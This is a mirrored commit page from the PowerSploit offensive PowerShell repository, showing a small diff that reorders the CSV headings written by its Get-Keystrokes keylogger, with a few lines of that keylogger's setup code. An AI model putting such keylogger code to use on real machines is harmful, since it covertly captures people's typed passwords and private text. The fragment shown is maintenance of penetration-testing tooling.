mirror of
https://github.com/PowerShellMafia/PowerSploit
synced 2026-06-08 12:13:33 +00:00
Merge pull request #68 from hydrajump/get-keystrokes-headings-reorder
Fix for headings in wrong order
This commit is contained in:
@@ -49,7 +49,7 @@ function Get-Keystrokes {
|
||||
$Initilizer = {
|
||||
$LogPath = 'REPLACEME'
|
||||
|
||||
'"TypedKey","Time","WindowTitle"' | Out-File -FilePath $LogPath -Encoding unicode
|
||||
'"WindowTitle","TypedKey","Time"' | Out-File -FilePath $LogPath -Encoding unicode
|
||||
|
||||
function KeyLog {
|
||||
[Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null
|
||||
|
||||
Reference in New Issue
Block a user